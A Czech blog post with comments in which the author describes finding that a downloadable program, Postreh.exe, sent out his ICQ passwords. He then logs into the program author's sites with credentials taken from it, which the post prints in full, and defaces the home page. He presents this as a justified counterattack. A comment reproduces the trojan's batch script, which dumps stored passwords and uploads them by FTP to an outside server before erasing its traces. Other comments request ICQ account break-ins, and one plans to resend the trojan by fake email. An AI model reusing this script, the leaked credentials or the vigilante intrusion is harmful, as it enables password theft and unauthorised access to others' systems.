Na co si dát pozor - stoyan.ic.cz Mozektevidi.net - Mozektevidi.net.

Na co si dát pozor - stoyan.ic.cz

Průnik na web stoyan.ic.cz (přesunoto stoyan.cz) Na co si dát pozor při tvorbě webu, zabezpečení proti hackingu. IT bezpečnost

image of Na co si dát pozor - stoyan.ic.cz

Hacking webu stoyan.ic.cz

Tak si znuděně surfuji na internetu a narazím na jeden web Stoyan.ic.cz. Zaujme mě program Postreh.exe

Tak si program stáhnu a pouštím. Program je taková jednoduchá kravinka.

Kouknu se na logy a vidím, že posílají nějaká data ven. Data zachytím a analyzuji. Hm, odesílaly se moje čísla a hesla na ICQ.

To mě poněkud naštve a i když jsem si řekl, že už nebudu hackovat, rozhodl jsem se k protiútoku. Zkoumal jsem web, ten program a po chvilce jsem zjistil jeho heslo. Uživatelské jméno zní ic_stoyan a heslo bylo pillow. Není to moc kvalitní heslo. Heslo bylo k jeho třem webům a k jeho databázi na IC.CZ. No tak jsem mohl vesele začít.

Upravil jsem jeho hlavní stránku (index.php) (původní jsem zálohoval)

V afektu jsem tam napsal:

Tyto www jsou hacknuty. Nic není smazáno, heslo se nezměnilo.
Hele moc nemachruj. Někde jsi si přečetl návod a pak se snažíš hackovat. Jsi lama.
 A to si ještě dovolíš dělat trojany. Cha. A zkoušíš hacknout mě!
 Dovol abych tě vysmál..

parody:Ptáte se proč to vlastně dělám? Ze dvou důvodů. Za prvé mě to baví a za druhé se snažím upozornit na chyby a bezpečnostní rizika daného webu - není v tom nic osobního. Také bych chtěl upozornit, že nikdy nic nemažu a každý změnený soubor zazálohuji. Říkáte si také, že to, co dělám je nelegální? Já si myslím, že není. Co takhle když jdete po ulici a uvidíte špatné zavřené auto? Zazvoníte na nejbližší zvonek a upozorníte majitele, ať si ho zavře pořádně. Je tohle trestné? Ne, je to jen dobrý úmysl. Můžete se mnou nesouhlasit, ale takto chápu i to, co dělám já. Také už mi bylo vytčeno, že si tímto způsobem pouze zvyšuji své EGO a dělám si reklamu. Prý proč chybu pouze potichu neopravím a nevypařím se? Na to je lehká odpověď. Pokud stránky adminovi mírně upravím (v mém případě pouze napíši kontakt na sebe) on uvidí, že chyba je opravdu vážná a bude s tím spíše něco dělat, než kdybych mu jen suše oznámil, že má na webu nějakou chybu. Teď k tomu tichému opravení. Samozřejmě je to možné, mnozí si jistě řeknou, že to je i to nejlepší, co jde v tomto případě udělat, ale já si to nemyslím. Admin nebude mít ani potuchy o tom, že jste mu na stránkách něco opravili a na příštích stránkách, které vytvoří, udělá stejnou chybu. Já prosazuji názor, že chybami se člověk učí. Takže pokud je admin alespoň trochu rozumný, ozve se mi a já mu danou chybu detailně popíši a navrhnu mu řešení. Šance, že pak admin udělá stejnou chybu znovu, je velmi malá./parody

Když jsem to dopsal a uložil na FTP, Upozornil jsem ho e-mailem.

Po chvilce se ozval a moc se divil ..

Co říci závěrem? Pár doporučení pro lepší zabezpečení webu.

  • Nemám rád trojany
  • Nezkoušejte mě hacknout
    • A nebo jo. Zkuste to
  • Nevolte si jednoduchá hesla
  • Neopakujte hesla
  • Co nechceš aby druzí činili tobě, nečiň ty jim.

autor článku OS | datum publikování 18.listopad.2006 17:17 | články o IT bezpečnosti a obraně proti hackingu IT bezpečnost |

Kometáře

#1 radši ne wwwne

Čau, docela mě tenhle článek zaujal, nemužeš ,prosím, napsat něco víc?? díky.. NVM reaguj

datum 21.12.2006 21:56

unknown unknown

#2 MzK wwwmozektevidi.net

TO radši ne: A co tě přesně zajímá? Ptej se, já to třeba odpovím. reaguj

datum 21.12.2006 22:08

unknown unknown

#3 radši ne wwwne

no.. třeba by mě zajímalo, jak si dokázal prolomit heslo.. zdá se mi to jako nemožné.. reaguj

datum 22.12.2006 06:57

unknown unknown

#4 MzK wwwmozektevidi.net

TO radši ne: Heslo jsem neprolamoval. Heslo měl v tom "trojanovi" napsané. Ten trojan posílal moje ICQ hesla na FTP. K tomu aby se to připojilo na FTP to musí znát heslo. Stačilo se kouknout do zdrojáku toho trojana. A měl jsem štěstí, že měl stejné heslo do všech webu na všechny FTP co má. :-P
Píšu to i v textu: Zkoumal jsem web, ten program a po chvilce jsem zjistil jeho heslo. reaguj

datum 23.12.2006 11:19

unknown unknown

#5 Stoyan wwwstoyan.ic.cz

"Stačilo se kouknout do zdrojáku toho trojana" ... Tohle bych teda trochu upresnil. Jelikoz program Postreh.exe byl napsany v Delphi (tudis kompilovany) do zdrojaku ses moc nepodival. Tedy teoreticky jsi ho mohl disassemblovat a v asm kodu si najit pozadovane informace, ale to jsi urcite nedelal, co? :-P Program po spusteni generoval textovy soubor, ve kterem bylo ftp user i password. To je nutne pro pripojeni se na ftp server. Soubor se mel po ukonceni programu smazat, bohuzel tam byla menis chybka, takze se tomu tak nedelo. Tobe tedy stacilo otevrit onen textovy soubor, precist si heslo a bylo to... Kazdy nazyva hackingem neco jineho, ale ja toto za hack fakt nepovazuju. To je jen muj skromny nazor. Ten "trojan" jak ho honosne nazyvas uz v programu dlouhou dobu neni, odstranil jsem ho ihned po tomto incidentu. Jinak preji vesele Vanoce (btw, chybi tu vanocni smajlik:-P) reaguj

datum 25.12.2006 12:51

unknown unknown

#6 MzK wwwmozektevidi.net

TO Stoyan: Šlo to ještě elegantněji. žádný soubor se ani nestačil vytvořit. "Trojan" jsem psal v uvozovkách :-P ale trojan to je. Sice primitivní ale je. Definice trojanu zní asi jako že v koni (program) jsou voják (záškodný program). To ten postreh splňuje. Nevadí mi že postřeh je kompilovaný, já nepotřeboval zdroják delphi ale zdroják cmd 8-) Ke zdojáku jsem se dostal - je tam shovaný program mpass a start.cmd. Start cmd obsahuje:

@Echo off

mspass/stext "%username%.txt"

echo open skauting.cz>"ftp.txt"
echo stoyan>>"ftp.txt"
echo HESLO>>"ftp.txt"
echo put "%username%.txt">>"ftp.txt"
echo quit>>"ftp.txt"

ftp -s:"ftp.txt"

del "%username%.txt"
del "ftp.txt"

del "mspass.exe"
del "start.cmd"
8-) reaguj

datum 25.12.2006 13:30

unknown unknown

#7 Stoyan wwwstoyan.ic.cz

No jo vlastne:) Ja uz sam zapomnel jak ten programek fungoval:-D Byla to strasna lamerina, tehdy jsem to jeste neumel udelat cely v Delphi, proto jsem pomoci delphi generoval cmd davku. No jo... chybami se clovek uciNVM reaguj

datum 25.12.2006 20:56

unknown unknown

#8 radši ne wwwne

AHÁÁ.. no jo.. to je docela vyčůraný :-D reaguj

datum 27.12.2006 12:30

unknown unknown

#9 bestfat www

kurva ty seš machr!chlape jak ses to naučil?hele plz napiš mi na majla něco o tvý kariéře hekra...jak tak na ty tvoje stránky koukam upe sem do toho zažranej! reaguj

datum 01.01.2007 01:16

unknown unknown

#10 beginer www

kto by ma daco naucil o hackingu? ak ma niekto cas tak mi pls napiste na 436-015-603 :-D :-P 8-) reaguj

datum 15.05.2007 14:57

unknown unknown

#11 lukas www

jaktoze se ti tady ukazuj nase IP adresy??????????????
!!! !!! !!! reaguj

datum 15.05.2007 20:34

unknown unknown

#12 Golfy wwwwww.golfy.gotia.cz

TO lukas: neukazujou! nejsou tu cely reaguj

datum 15.05.2007 20:41

unknown unknown

#13 matej21 www

TO lukas: jj, jak rika golfy :-P je tam vycenzurovany posledni trojcisli... jen pro zajimavost: nedavno byla na strankach nejkupovanejsi pocitacoveho casopisu v CR :-D videt IP cela... reaguj

datum 15.05.2007 20:56

unknown unknown

#14 Golfy wwwwww.golfy.gotia.cz

TO matej21: to je kterej? název=angl.počítač? reaguj

datum 15.05.2007 21:57

unknown unknown

#15 matej21 www

TO Golfy: jj, tak nejak... jeste muzu napovedet ze si to kupuju :-D reaguj

datum 15.05.2007 22:08

unknown unknown

#16 MzK wwwmozektevidi.net

TO lukas: Co takle trochu šetřit s vykřičníky a otazníky? Stačí pouze jeden, pak vypadáš jako dvanáctiletý dítě. reaguj

datum 15.05.2007 23:59

unknown unknown

#17 Emi www

kdyby ses někdy ,,nudil´´ napiš mi třeba na mejla náký úplně jednoduchý věcičky .... něco základního. Budu ráda 8-) reaguj

datum 18.05.2007 15:52

unknown unknown

#18 patrik www

Ahoj mohl by jsi mi prosimte zjistit heslo na icq 191-824-818.Díky moc nekdo mi ho totiz ukradl a ja se tam nemuzu zpatky dostat diky moc fakt dík. reaguj

datum 27.05.2007 12:21

unknown unknown

#19 Lola www

reakce na »MzK«: (MzK) Můžeš mi pomoct s heslem? Umíš zjistit heslo emailu a icq? Napiš porsim na mail... reaguj

datum 28.05.2007 20:59

unknown unknown

#20 DanHinote www

Potřeboval bych zjistit zapomenuté heslo na icq.Najde se nějakéj machr co by to zmáknul???Dík reaguj

datum 23.11.2007 12:43

internet-explorer-6 windows-xp

#21 m.a.t.l.o.s www

Zdravím,
smekám před MzK. Taky zjišťuji heslo jednoho icq. Stáhl jsem se program postreh.exe s tím, že si ho v Dede upravím tak aby mi heslo posílal na moje FTP. Program bych pak oběti poslal třeba přes fake mail. No asi je vám jasný že to něšlo, protože ten "trojan" v tom už není... Proto chcu říct že kdyby mi s tím chtěl někdo pomoct tak klidně může... reaguj

datum 23.11.2007 20:21

firefox windows-xp

#22 Saruman www

reakce na »MzK«: Asi ho to vzalo... reaguj

datum 07.12.2007 19:45

firefox windows-xp

#23 Bagy wwwbagy.ic.cz

njn záchvaty lamojdnosti, které jsem naštěstí před rokem(12) neměl :) reaguj

datum 07.12.2007 21:00

internet-explorer-7 gnu-linux

#24 help www

Ahoj potřebuju pomoc nějaka kurva si vytvořila icq a piše za mě mym kamošum je to 366883485 proto se obracim na vas hackery o pomoc kdyby ste zistily třeba jen mail toho kdo to icq vlastni či ip adresu nebo tak mohlo by to pomoct kdyžtak pisněte na mail diky všem... reaguj

datum 06.03.2008 16:54

firefox windows-xp

#25 Nobelicek wwwmozekhovnovidi.net

reakce na »help«: A k cemu by ti ta jeho IP adresa byla? :D Zmlatil bys mu ji paketem? :D reaguj

datum 07.03.2008 08:10

firefox windows-xp

#26 Tomas.Velky wwwako-schudnut.kvalitne.cz/

Zaujímavý hack reaguj

datum 14.03.2008 12:18

firefox windows-xp

#27 Martin www

Zdravím.chtel bych pomoc s icq heslem mam novej PC a nepamatuju si heslo ani kontrolni otazku.kdyby tu byl nekdo tak hodnej a pomohl by mi pls ozvete se mi na muj email.předem dekuji reaguj

datum 17.03.2008 11:12

internet-explorer-7 windows-vista

#28 Pavel www

Prosim potrebuju heslo k ICQ 417145927 pomuze mi nekdo ?????pls reaguj

datum 23.05.2008 21:38

opera windows-xp

Nové kometáře nejsou povolené.